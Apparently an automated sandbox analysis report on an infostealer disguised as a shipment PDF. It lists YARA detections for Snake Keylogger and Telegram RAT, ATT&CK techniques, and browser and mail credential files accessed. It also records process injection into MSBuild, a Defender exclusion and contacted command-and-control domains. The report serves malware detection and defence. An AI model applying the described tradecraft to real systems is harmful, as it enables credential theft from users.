                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeQueries volume information: C:\Users\user\AppData\Roaming\FZcXKpA.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7252, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7252, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7252, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		311
                  Process Injection                  		11
                  Masquerading                  		1
                  OS Credential Dumping                  		11
                  Security Software Discovery                  		Remote Services1
                  Email Collection                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  Scheduled Task/Job                  		11
                  Disable or Modify Tools                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop Protocol11
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		31
                  Virtualization/Sandbox Evasion                  		Security Account Manager31
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA Secrets1
                  System Network Configuration Discovery                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
                  Obfuscated Files or Information                  		Cached Domain Credentials1
                  File and Directory Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                  Software Packing                  		DCSync13
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575105 Sample: Shipment 990847575203.pdf.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 56 reallyfreegeoip.org 2->56 58 api.telegram.org 2->58 60 6 other IPs or domains 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Sigma detected: Scheduled temp file as task from temp location 2->66 72 16 other signatures 2->72 8 Shipment 990847575203.pdf.exe 7 2->8         started        12 FZcXKpA.exe 5 2->12         started        signatures3 68 Tries to detect the country of the analysis system (by using the IP) 56->68 70 Uses the Telegram API (likely for C&C communication) 58->70 process4 file5 40 C:\Users\user\AppData\Roaming\FZcXKpA.exe, PE32 8->40 dropped 42 C:\Users\user\...\FZcXKpA.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\user\AppData\Local\Temp\tmp56D.tmp, XML 8->44 dropped 46 C:\...\Shipment 990847575203.pdf.exe.log, ASCII 8->46 dropped 74 Writes to foreign memory regions 8->74 76 Allocates memory in foreign processes 8->76 78 Adds a directory exclusion to Windows Defender 8->78 14 powershell.exe 23 8->14         started        17 MSBuild.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        80 Multi AV Scanner detection for dropped file 12->80 82 Machine Learning detection for dropped file 12->82 84 Injects a PE file into a foreign processes 12->84 24 MSBuild.exe 12->24         started        26 schtasks.exe 12->26         started        28 MSBuild.exe 12->28         started        signatures6 process7 dnsIp8 86 Loading BitLocker PowerShell Module 14->86 30 conhost.exe 14->30         started        32 WmiPrvSE.exe 14->32         started        48 api.telegram.org 149.154.167.220, 443, 49755, 49768 TELEGRAMRU United Kingdom 17->48 50 kashmirestore.com 119.18.54.39, 21, 49758, 49760 PUBLIC-DOMAIN-REGISTRYUS India 17->50 54 3 other IPs or domains 17->54 34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        52 132.226.247.73, 49753, 49759, 49764 UTMEMUS United States 24->52 88 Tries to steal Mail credentials (via file / registry access) 24->88 90 Tries to harvest and steal browser information (history, passwords, etc) 24->90 38 conhost.exe 26->38         started        signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Shipment 990847575203.pdf.exe66%ReversingLabsWin32.Infostealer.Generic
                  Shipment 990847575203.pdf.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\FZcXKpA.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\FZcXKpA.exe66%ReversingLabsWin32.Infostealer.Generic

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://kashmirestore.com0%Avira URL Cloudsafe
                  http://go.microsoHX0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.214.172
                  		truefalse
                    		high
                    kashmirestore.com
                    		119.18.54.39
                    		truefalse
                      		high
                      reallyfreegeoip.org
                      		172.67.177.134
                      		truefalse
                        		high
                        api.telegram.org
                        		149.154.167.220
                        		truefalse
                          		high
                          fp2e7a.wpc.phicdn.net
                          		192.229.221.95
                          		truefalse
                            		high
                            checkip.dyndns.com
                            		158.101.44.242
